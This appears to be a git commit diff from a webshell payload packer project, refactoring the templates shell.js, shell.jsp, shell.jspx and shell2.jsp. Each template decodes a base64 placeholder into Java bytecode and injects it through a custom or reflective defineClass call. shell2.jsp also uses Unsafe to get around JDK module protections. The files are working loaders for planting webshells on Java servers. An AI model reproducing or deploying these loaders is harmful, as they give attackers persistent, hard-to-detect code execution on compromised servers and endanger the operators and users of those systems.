
Commit a832228

committed
refactor: simplify payload
1 parent b71cd4a commit a832228


5 files changed

+20
-62
lines changed


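--- a/packer/src/main/resources/shell.js
+++ b/packer/src/main/resources/shell.js
@@ -1,12 +1,9 @@
 var base64Str = "{{base64Str}}";
-var clsString = java.lang.Class.forName("java.lang.String");
 var bytecode;
 try {
-var decoder = java.lang.Class.forName("java.util.Base64").getMethod("getDecoder").invoke(null);
-bytecode = decoder.getClass().getMethod("decode", clsString).invoke(decoder, base64Str);
+bytecode = java.util.Base64.getDecoder().decode(base64Str);
 } catch (ee) {
-var decoder = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance();
-bytecode = decoder.getClass().getMethod("decodeBuffer", clsString).invoke(decoder, base64Str);
+bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
 }
 var clsByteArray = (new java.lang.String("a").getBytes().getClass());
 var clsInt = java.lang.Integer.TYPE;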

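--- a/packer/src/main/resources/shell.jsp
+++ b/packer/src/main/resources/shell.jsp
@@ -1,10 +1,3 @@
-<%@ page import="java.lang.*" %>
-<%@ page import="java.lang.Class" %>
-<%@ page import="java.lang.ClassLoader" %>
-<%@ page import="java.lang.ClassNotFoundException" %>
-<%@ page import="java.lang.Object" %>
-<%@ page import="java.lang.String" %>
-<%@ page import="java.lang.Thread" %>
 <%!
 public static class ClassDefiner extends ClassLoader {
 public ClassDefiner(ClassLoader classLoader) {
@@ -21,12 +14,9 @@
 String base64Str = "{{base64Str}}";
 byte[] bytecode = null;
 try {
-Class base64Clz = Class.forName("java.util.Base64");
-Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
-bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
-} catch (ClassNotFoundException ee) {
-Class datatypeConverterClz = Class.forName("javax.xml.bind.DatatypeConverter");
-bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
+bytecode = java.util.Base64.getDecoder().decode(base64Str);
+} catch (Throwable ee) {
+bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
 }
 Class clazz = new ClassDefiner(Thread.currentThread().getContextClassLoader()).defineClass(bytecode);
 clazz.newInstance();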

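--- a/packer/src/main/resources/shell.jspx
+++ b/packer/src/main/resources/shell.jspx
@@ -16,12 +16,9 @@
 String base64Str = "{{base64Str}}";
 byte[] bytecode = null;
 try {
-Class base64Clz = classLoader.loadClass("java.util.Base64");
-Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
-bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
-} catch (ClassNotFoundException ee) {
-Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
-bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
+bytecode = java.util.Base64.getDecoder().decode(base64Str);
+} catch (Throwable ee) {
+bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
 }
 Class clazz = new ClassDefiner(classLoader).defineClass(bytecode);
 clazz.newInstance();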
Lines changed: 4 additions & 15 deletions
@@ -1,24 +1,13 @@
1-
<%@ page import="java.lang.*" %>
2-
<%@ page import="java.lang.Class" %>
3-
<%@ page import="java.lang.ClassLoader" %>
4-
<%@ page import="java.lang.ClassNotFoundException" %>
5-
<%@ page import="java.lang.Object" %>
6-
<%@ page import="java.lang.String" %>
7-
<%@ page import="java.lang.Thread" %>
81
<%
9-
ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
102
String base64Str = "{{base64Str}}";
113
byte[] bytecode = null;
124
try {
13-
Class base64Clz = classLoader.loadClass("java.util.Base64");
14-
Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
15-
bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
16-
} catch (ClassNotFoundException ee) {
17-
Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
18-
bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
5+
bytecode = java.util.Base64.getDecoder().decode(base64Str);
6+
} catch (Throwable ee) {
7+
bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
198
}
209
java.lang.reflect.Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
2110
defineClass.setAccessible(true);
22-
Class clazz = (Class) defineClass.invoke(classLoader, bytecode, 0, bytecode.length);
11+
Class clazz = (Class) defineClass.invoke(Thread.currentThread().getContextClassLoader(), bytecode, 0, bytecode.length);
2312
clazz.newInstance();
2413
%>

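--- a/packer/src/main/resources/shell2.jsp
+++ b/packer/src/main/resources/shell2.jsp
@@ -1,25 +1,4 @@
-<%@ page import="java.lang.*" %>
-<%@ page import="java.lang.Class" %>
-<%@ page import="java.lang.ClassLoader" %>
-<%@ page import="java.lang.ClassNotFoundException" %>
-<%@ page import="java.lang.Integer" %>
-<%@ page import="java.lang.Long" %>
-<%@ page import="java.lang.Object" %>
-<%@ page import="java.lang.String" %>
-<%@ page import="java.lang.Thread" %>
-<%@ page import="java.lang.Throwable" %>
 <%
-String base64Str = "{{base64Str}}";
-byte[] bytecode = null;
-ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
-try {
-Class base64Clz = classLoader.loadClass("java.util.Base64");
-Object decoder = base64Clz.getMethod("getDecoder").invoke(null);
-bytecode = (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
-} catch (ClassNotFoundException ee) {
-Class datatypeConverterClz = classLoader.loadClass("javax.xml.bind.DatatypeConverter");
-bytecode = (byte[]) datatypeConverterClz.getMethod("parseBase64Binary", String.class).invoke(null, base64Str);
-}
 Object unsafe = null;
 Object rawModule = null;
 long offset = 48;
@@ -37,10 +16,16 @@
 getAndSetObjectM.invoke(unsafe, this.getClass(), offset, module);
 } catch (Throwable ignored) {
 }
-java.net.URLClassLoader urlClassLoader = new java.net.URLClassLoader(new java.net.URL[0], Thread.currentThread().getContextClassLoader());
+String base64Str = "{{base64Str}}";
+byte[] bytecode = null;
+try {
+bytecode = java.util.Base64.getDecoder().decode(base64Str);
+} catch (Throwable ee) {
+bytecode = new sun.misc.BASE64Decoder().decodeBuffer(base64Str);
+}
 java.lang.reflect.Method defMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, Integer.TYPE, Integer.TYPE);
 defMethod.setAccessible(true);
-Class<?> clazz = (Class<?>) defMethod.invoke(urlClassLoader, bytecode, 0, bytecode.length);
+Class<?> clazz = (Class<?>) defMethod.invoke(Thread.currentThread().getContextClassLoader(), bytecode, 0, bytecode.length);
 if (getAndSetObjectM != null) {
 getAndSetObjectM.invoke(unsafe, this.getClass(), offset, rawModule);
 }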
